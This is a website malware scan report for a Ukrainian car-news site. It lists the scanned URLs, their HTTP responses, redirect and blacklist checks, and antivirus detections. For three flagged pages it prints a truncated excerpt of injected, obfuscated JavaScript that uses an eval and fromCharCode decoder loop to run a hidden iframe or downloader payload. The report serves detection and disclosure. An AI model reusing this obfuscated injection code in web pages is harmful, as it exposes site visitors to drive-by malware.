New scan:

Malware Scanner report for avto-novosti.com.ua

Malicious/Suspicious/Total urls checked
3/0/16
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://avto-novosti.com.ua/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 17:33:45 GMT
Location: http://www.avto-novosti.com.ua
Server: nginx/1.4.7
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
clean
http://www.avto-novosti.com.ua/
200 OK
Content-Length: 39482
Content-Type: text/html
clean
http://www.avto-novosti.com.ua/plugins/content/extravote/extravote.js
200 OK
Content-Length: 2184
Content-Type: application/x-javascript
clean
http://avto-novosti.com.ua/avto-novosti/js/jquery-1.4.3.min.js
200 OK
Content-Length: 77746
Content-Type: application/x-javascript
clean
http://avto-novosti.com.ua/js/jquery-1.4.3.min.js
200 OK
Content-Length: 77746
Content-Type: application/x-javascript
clean
http://avto-novosti.com.ua/modules/mod_raxo_allmode/tmpl/allmode_portal/allmode_portal.js
200 OK
Content-Length: 3335
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21347
Content-Type: text/javascript
clean
http://avto-novosti.com.ua/latest-news.html
200 OK
Content-Length: 52945
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 3052 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://avto-novosti.com.ua/plugins/content/extravote/extravote.js
200 OK
Content-Length: 2184
Content-Type: application/x-javascript
clean
http://avto-novosti.com.ua/novi-avtomobili.html
200 OK
Content-Length: 52766
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 3052 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://avto-novosti.com.ua/test-drive.html
200 OK
Content-Length: 46701
Content-Type: text/html
clean
http://avto-novosti.com.ua/auto-statti.html
200 OK
Content-Length: 45908
Content-Type: text/html
clean
http://avto-novosti.com.ua/auto-statti.html?view=article&id=665%3Aksenon-abo-svtlododi-led-shho-krashhe&catid=6%3Aauto-statti
500 Internal Server Error
Content-Length: 18783
Content-Type: text/html
clean
http://avto-novosti.com.ua/index.php
200 OK
Content-Length: 45331
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 3052 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://avto-novosti.com.ua/latest-news.html?view=category&layout=blog&id=1
200 OK
Content-Length: 47953
Content-Type: text/html
clean
http://avto-novosti.com.ua/latest-news.html?view=article&id=694%3Apodrobicz-pro-xetchbek-lada-xray-krosover-lada-xray-cross&catid=1%3Aostanni-novyny
500 Internal Server Error
Content-Length: 18783
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: avto-novosti.com.ua

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 17:33:45 GMT
Location: http://www.avto-novosti.com.ua
Server: nginx/1.4.7
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1

...323 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: avto-novosti.com.ua
Referer: http://www.google.com/search?q=avto-novosti.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=avto-novosti.com.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://avto-novosti.com.ua/

Result: avto-novosti.com.ua is not infected or malware details are not published yet.